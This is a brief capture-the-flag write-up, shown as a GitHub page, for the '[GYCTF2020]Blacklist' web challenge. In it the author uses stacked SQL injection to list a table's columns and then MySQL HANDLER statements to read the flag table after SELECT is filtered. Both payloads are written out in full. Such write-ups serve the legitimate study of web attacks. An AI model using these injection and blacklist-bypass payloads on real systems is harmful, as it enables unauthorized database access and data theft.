Skip to content

Latest commit

 

History

History
27 lines (22 loc) · 913 Bytes

GYCTF2020-Blacklist.md

File metadata and controls

27 lines (22 loc) · 913 Bytes
title author avatar authorAbout authorDesc categories comments date authorLink tags keywords description photos
[GYCTF2020]Blacklist
Troy3e
steamID:888007034
Blizzard:TroyeSivan#51769
技术
true
2020-07-16 16:09:27 -0700

这道题好像在哪见过,应该是上次强网杯的那个堆叠注入。 1';show columns from FlagHere;#

flag就在这里,但是select被过滤了,这里要利用HANDLER

1';handler FlagHere open;handler FlagHere read first;Handler FlagHere close;#